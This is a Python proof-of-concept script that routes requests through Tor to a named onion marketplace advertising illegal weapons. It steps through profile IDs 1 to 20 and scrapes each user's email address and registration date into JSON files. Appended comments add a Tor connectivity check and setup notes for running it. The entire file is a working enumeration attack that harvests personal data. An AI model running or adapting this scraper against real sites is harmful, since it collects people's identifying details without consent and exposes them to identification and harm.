poc.py (forked from hoodietramp/capNcook)
import requests
import json
from bs4 import BeautifulSoup
import os


# Function to fetch user profile data and save it to a file
def fetch_user_data_and_save(onion_link, index, output_dir):
    url = f'http://{onion_link}/profile.php?id={index}'

    # Configure the proxy to route requests through Tor
    proxies = {
        'http': 'socks5h://127.0.0.1:9050',
        'https': 'socks5h://127.0.0.1:9050'
    }

    response = requests.get(url, proxies=proxies)

    if response.status_code == 200:
        soup = BeautifulSoup(response.text, 'html.parser')

        data_dict = {
            "Email": "",
            "RegistrationDate": ""
        }

        # Find email and registration date based on HTML structure
        for td in soup.find_all('td', class_='left'):
            lines = td.get_text().strip().split('\n')
            for line in lines:
                if "Email:" in line:
                    data_dict["Email"] = line.split("Email:")[1].strip()
                elif "This user was registred on" in line:
                    data_dict["RegistrationDate"] = line.split("on")[1].strip()

        # Create a JSON string
        json_data = json.dumps(data_dict, indent=4)

        # Save JSON data to a file
        output_file = os.path.join(output_dir, f'recon{index}.json')
        with open(output_file, 'w') as json_file:
            json_file.write(json_data)

        print(f"JSON response saved to '{output_file}'")
        return output_file
    else:
        print(f"Request for ID {index} failed with status code:", response.status_code)
        return None
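

# --- Optional Tor connectivity check (a minimal sketch, not part of the original
# PoC). It assumes the Tor SOCKS proxy is listening on 127.0.0.1:9050, as used
# above, and that check.torproject.org is reachable; adjust or drop as needed.
def tor_is_up():
    proxies = {
        'http': 'socks5h://127.0.0.1:9050',
        'https': 'socks5h://127.0.0.1:9050'
    }
    try:
        # If a request routed through the proxy succeeds, treat Tor as reachable.
        requests.get('https://check.torproject.org/', proxies=proxies, timeout=30)
        return True
    except requests.RequestException:
        return False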
# Onion link and output directory
onion_link = "gunsganos2raowan5y2nkblujnmza32v2cwkdgy6okciskzabchx4iqd.onion"
os.system("echo 'gunsganos2raowan5y2nkblujnmza32v2cwkdgy6okciskzabchx4iqd.onion ; Guns & Ganja - Buy Illegal Weapons [ Verified Vendors ]' | lolcat")
output_dir = 'json_response'
os.makedirs(output_dir, exist_ok=True)

# List to store response files
response_files = []

# Loop through IDs from 1 to 20 and fetch user data
for index in range(1, 21):
    response_file = fetch_user_data_and_save(onion_link, index, output_dir)
    if response_file:
        response_files.append(response_file)

# Display the JSON content in the terminal using cat and jq
if response_files:
    cat_command = f"cat {' '.join(response_files)} | jq"
    os.system(cat_command)
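
# Usage notes (not part of the original script; summarised from the code above):
# - requests needs the SOCKS extra so that 'socks5h://' proxy URLs work:
#     pip install "requests[socks]" beautifulsoup4
# - A Tor client is assumed to be running locally with its SOCKS port on
#   127.0.0.1:9050 (the tor daemon default; Tor Browser uses 9150 instead).
# - The banner and the final pretty-printing shell out to 'lolcat' and 'jq',
#   which are assumed to be installed and on PATH.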